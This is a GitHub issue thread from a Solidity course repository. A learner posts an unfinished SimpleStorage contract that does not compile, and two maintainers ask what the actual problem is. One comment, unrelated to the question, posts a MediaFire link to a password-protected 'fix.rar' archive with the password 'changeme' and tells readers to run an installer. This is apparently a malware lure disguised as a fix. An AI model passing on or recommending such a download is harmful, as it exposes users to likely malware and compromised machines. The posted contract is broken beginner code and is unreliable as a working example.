### ISSUE TITLE
issue on a my storageFactoru

### ISSUE THREAD

**Issue by Adornai** [Cyfrin/remix-storage-factory-f23#2]
```solidity
// SPDX-License-Identifier: MIT

pragma solidity 0.8.24;

contract SimpleStorage {
    uint256 public myFavouriteNumber; //0

    //uint256[] listsOfFavouriteNumber;
     struct Person {
     uint256 favouriteNumber;
     string name;
     }

// dynamics array []
// static array has any number inside [6]
    Person[] public listOfPeople; // []

    mapping(string => uint256) public nameToFavouriteNumber;
     
    // Person public pat = Person (7, "pat") ;

    //person public adornai = Person({favouriteNumber: 7, name: "adornai"});

    function store(uint256 _favouriteNumber) public {
        myFavouriteNumber = _favouriteNumber;
    }

    function retrieve() public view returns(uint256) {
        return myFavouriteNumber;
    }

    function addPerson(string memory _name, uint256 _favoriteNumber)public {
    //Person memory newPerson = Person(_favoriteNumber, _name);
    listOfPeople.push(Person(_favoriteNumber, _name) );
    nameToFavouriteNumber[_name] = _favoriteNumber;
    }

contract storageFactory {

    function createSimpleStorageContact() public
}

}

```

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by cromewar** [comment]
Hello @Adornai, thanks for posting your issue here, though is a little bit complex to understand what the problem is if you don't set this up properly, so please.

1. Check [how to ask questions](https://github.com/Cyfrin/foundry-full-course-cu/blob/main/how-to-ask-a-question.md)
2. Post your question/issue on this [repo](https://github.com/Cyfrin/foundry-full-course-cu/discussions), as is the official course repo discussion other people might have encounter your problem before you.

Please let us know what the actual issue is so we could provide you better support here.

cc @PatrickAlphaC

**Comment by PatrickAlphaC** [comment]
Going to close for now, not sure what the issue is here. Could you clarify the question @Adornai ?
